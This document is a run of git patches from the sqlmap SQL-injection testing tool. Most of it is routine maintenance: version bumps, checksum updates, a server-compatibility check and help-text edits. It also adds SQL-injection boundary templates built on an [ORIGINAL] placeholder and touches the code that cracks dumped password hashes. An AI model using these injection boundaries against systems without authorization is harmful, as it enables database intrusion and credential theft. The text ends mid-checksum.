lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py -c0cabedead14b8a23353b606672cff42 lib/request/comparison.py +859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py From 12012b36b195d416db8a9ccd48fcbf0d3701db4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:01:17 +0200 Subject: [PATCH 258/428] Automatic disabling of socket-preconnect for known problematic server (SimpleHTTPServer) --- lib/controller/checks.py | 5 +++++ lib/core/option.py | 1 + lib/core/settings.py | 5 ++++- lib/request/connect.py | 1 + txt/checksum.md5 | 8 ++++---- 5 files changed, 15 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4d0bda2e02e..cff287cdaf5 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -88,6 +88,7 @@ from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH +from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS @@ -1554,6 +1555,10 @@ def checkConnection(suppressOutput=False): kb.errorIsNone = False + if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS): + singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader) + conf.disablePrecon = True + if not kb.originalPage and wasLastResponseHTTPError(): errMsg = "unable to retrieve page content" raise SqlmapConnectionException(errMsg) diff --git a/lib/core/option.py b/lib/core/option.py index 9e70fb8da9d..3241edf9ebb 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1852,6 +1852,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.safeCharEncode = False kb.safeReq = AttribDict() kb.secondReq = None + kb.serverHeader = None kb.singleLogFlags = set() kb.skipSeqMatcher = False kb.reduceTests = None diff --git a/lib/core/settings.py b/lib/core/settings.py index bdac7948476..f39fd3a68db 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.0" +VERSION = "1.2.9.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -97,6 +97,9 @@ # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) PRECONNECT_CANDIDATE_TIMEOUT = 10 +# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support) +PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",) + # Maximum sleep time in "Murphy" (testing) mode MAX_MURPHY_SLEEP_TIME = 3 diff --git a/lib/request/connect.py b/lib/request/connect.py index 5a3a267d9c3..1bcc2c1a43c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -493,6 +493,7 @@ class _(dict): code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() + kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader) else: code = None responseHeaders = {} diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 65e05f8f69e..d37dc4a3cc9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py 0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -7493c782345a60f6c00c9281d51a494e lib/controller/checks.py +2058987606ad75435c69d28cab11ef9e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -43,14 +43,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -6826030069e1cd88eb87603a50b2d251 lib/core/option.py +62fb1b8e7a82c726eb9631daac4c82e9 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bdb6b2b1b842c4f5e2874fe3a199f648 lib/core/settings.py +153ad66f2a6789909f4a4702650397dc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py +4ac4e1d10210bb1bc3d64a3532c5ff8b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f125f64a809aece1528b35835161000ee9ebc62d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:14:25 +0200 Subject: [PATCH 259/428] Minor style update (marker for empty cracked password) --- lib/core/settings.py | 5 ++++- lib/utils/hash.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f39fd3a68db..8ba1f177484 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.1" +VERSION = "1.2.9.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -429,6 +429,9 @@ # Display hash attack info every mod number of items HASH_MOD_ITEM_DISPLAY = 11 +# Display marker for (cracked) empty password +HASH_EMPTY_PASSWORD_MARKER = "" + # Maximum integer value MAX_INT = sys.maxint diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 4b4e194fb2c..05cd2a817c4 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -75,6 +75,7 @@ from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import DUMMY_USER_PREFIX +from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD from lib.core.settings import IS_WIN @@ -684,7 +685,7 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()])) + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d37dc4a3cc9..30b66628c2f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -153ad66f2a6789909f4a4702650397dc lib/core/settings.py +5e2fea9a1e0cc3d12578dbcf079dba67 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -109,7 +109,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -05dbc49838ca0454ce401ad616acf8c5 lib/utils/hash.py +d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From fa3f3baf1eb7ae22945186993d3e9f0dc3959c97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:24:40 +0200 Subject: [PATCH 260/428] Minor update --- lib/core/dump.py | 2 ++ lib/core/settings.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index b3e876c42aa..b5d0b6c6887 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -47,6 +47,7 @@ from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT +from lib.core.settings import VERSION_STRING from lib.core.settings import WINDOWS_RESERVED_NAMES from thirdparty.magic import magic @@ -532,6 +533,7 @@ def dbTableValues(self, tableValues): elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "\n\n\n") dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) + dataToDumpFile(dumpFP, "\n" % VERSION_STRING) dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) dataToDumpFile(dumpFP, "\n\n\n\n\n\n") diff --git a/lib/core/settings.py b/lib/core/settings.py index 8ba1f177484..a8fff133469 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.2" +VERSION = "1.2.9.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -792,9 +792,9 @@ background-color: #D3DFEE } td{ - font-size:10px; + font-size:12px; } th{ - font-size:10px; + font-size:12px; } """ diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30b66628c2f..e8eba4243b1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -37,7 +37,7 @@ fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py -9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py +d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5e2fea9a1e0cc3d12578dbcf079dba67 lib/core/settings.py +f2ec47bbf669523c8e874eb63adf0126 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From dbcf030743a66c264cb86c94e1145494e48dc305 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:30:58 +0200 Subject: [PATCH 261/428] Accepting even dummy (e.g.) 'y' for --answers --- lib/core/common.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 99cce710312..5edc4f3ee3c 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1009,6 +1009,9 @@ def readInput(message, default=None, checkBatch=True, boolean=False): kb.prependFlag = False if conf.get("answers"): + if not any(_ in conf.answers for _ in ",="): + return conf.answers + for item in conf.answers.split(','): question = item.split('=')[0].strip() answer = item.split('=')[1] if len(item.split('=')) > 1 else None diff --git a/lib/core/settings.py b/lib/core/settings.py index a8fff133469..c97f3dea50f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.3" +VERSION = "1.2.9.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e8eba4243b1..d0e366a3351 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -3652331fec15a31ace15d8cce4024495 lib/core/common.py +6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f2ec47bbf669523c8e874eb63adf0126 lib/core/settings.py +daae048e858ee6f618e93bd0685dd1f4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 95be19a692053c78da3e5a263019868517b0fedf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:15:15 +0200 Subject: [PATCH 262/428] Minor update --- lib/core/settings.py | 2 +- sqlmapapi.py | 4 ++-- txt/checksum.md5 | 10 +++++----- 3 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c97f3dea50f..b20c1d2d9e3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.4" +VERSION = "1.2.9.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmapapi.py b/sqlmapapi.py index c653aa3002e..14132bbdf6c 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -40,8 +40,8 @@ def main(): # Parse command line options apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-s", "--server", help="Run as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-c", "--client", help="Run as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d0e366a3351..cdfd423d6d5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py +738e160412b3cb52bdeb7bc58dec91c9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -daae048e858ee6f618e93bd0685dd1f4 lib/core/settings.py +1e62a08b7dc32e7063ca5d981354c5fc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ -4eaeef94314956e4517e5310a28d579a sqlmapapi.py +cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py @@ -469,8 +469,8 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -6debc049a8049b890ca109a731c60782 xml/boundaries.xml -0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml +8400e0dce3304eae2189fdff5813d7fe xml/boundaries.xml +6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml From ad5a73199927b388e313eeb3c63eb89a32156487 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:16:35 +0200 Subject: [PATCH 263/428] First commit for Issue #120 --- lib/core/agent.py | 3 ++- xml/boundaries.xml | 11 +++++++++++ xml/errors.xml | 1 + 3 files changed, 14 insertions(+), 1 deletion(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index ebdbb6e4107..63c7e485105 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -301,7 +301,8 @@ def cleanupPayload(self, payload, origValue=None): ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar), ("[HASH_REPLACE]", kb.chars.hash_), - ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT), + ("[ORIGINAL]", origValue or "") ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) diff --git a/xml/boundaries.xml b/xml/boundaries.xml index b61dcb6e0f2..cd954ebcfb8 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -488,6 +488,17 @@ Formats: + + + 4 + 1 + 1 + 1 + ` + AND `[ORIGINAL] + + + 4 diff --git a/xml/errors.xml b/xml/errors.xml index a4c95b2a526..5889f842eb9 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -9,6 +9,7 @@ + From 91c5151770fd9445770bf631d0ecedce6dadd3e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:56:39 +0200 Subject: [PATCH 264/428] Another update related to the #120 --- lib/core/agent.py | 10 ++++++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- xml/boundaries.xml | 9 +++++++++ 4 files changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 63c7e485105..1a6f9819972 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -301,8 +301,7 @@ def cleanupPayload(self, payload, origValue=None): ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar), ("[HASH_REPLACE]", kb.chars.hash_), - ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT), - ("[ORIGINAL]", origValue or "") + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) @@ -312,9 +311,12 @@ def cleanupPayload(self, payload, origValue=None): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): payload = payload.replace(_, randomStr()) - if origValue is not None and "[ORIGVALUE]" in payload: + if origValue is not None: origValue = getUnicode(origValue) - payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if "[ORIGVALUE]" in payload: + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if "[ORIGINAL]" in payload: + payload = getUnicode(payload).replace("[ORIGINAL]", origValue) if INFERENCE_MARKER in payload: if Backend.getIdentifiedDbms() is not None: diff --git a/lib/core/settings.py b/lib/core/settings.py index b20c1d2d9e3..1a3cd30c79f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.5" +VERSION = "1.2.9.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cdfd423d6d5..abaeddb63d8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -738e160412b3cb52bdeb7bc58dec91c9 lib/core/agent.py +8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1e62a08b7dc32e7063ca5d981354c5fc lib/core/settings.py +24ed497dd48a34fdada54a0cb62f1161 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -469,7 +469,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -8400e0dce3304eae2189fdff5813d7fe xml/boundaries.xml +55216973f6846ea2b3c3da39464dbf7e xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index cd954ebcfb8..8ecfe598006 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -497,6 +497,15 @@ Formats: ` AND `[ORIGINAL] + + + 5 + 1 + 1 + 1 + "=[ORIGINAL] + AND [ORIGINAL]="[ORIGINAL] + From ac481492c0f487993b7dbb2480c80f61c0358b97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 23:29:52 +0200 Subject: [PATCH 265/428] Final commit for #120 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 10 ++++---- xml/boundaries.xml | 26 +++++++++++++------ xml/payloads/boolean_blind.xml | 10 ++++---- xml/payloads/error_based.xml | 46 +++++++++++++++++----------------- xml/payloads/time_blind.xml | 14 +++++------ 6 files changed, 59 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1a3cd30c79f..d3ce650b61c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.6" +VERSION = "1.2.9.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index abaeddb63d8..1ae853c3ba3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -24ed497dd48a34fdada54a0cb62f1161 lib/core/settings.py +c97ad42bb26a96c31617bd6e89de0761 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -469,13 +469,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -55216973f6846ea2b3c3da39464dbf7e xml/boundaries.xml +b306c99a038b03421beea655dc804b64 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml -b5b8b0aebce810e6cdda1b7106c96427 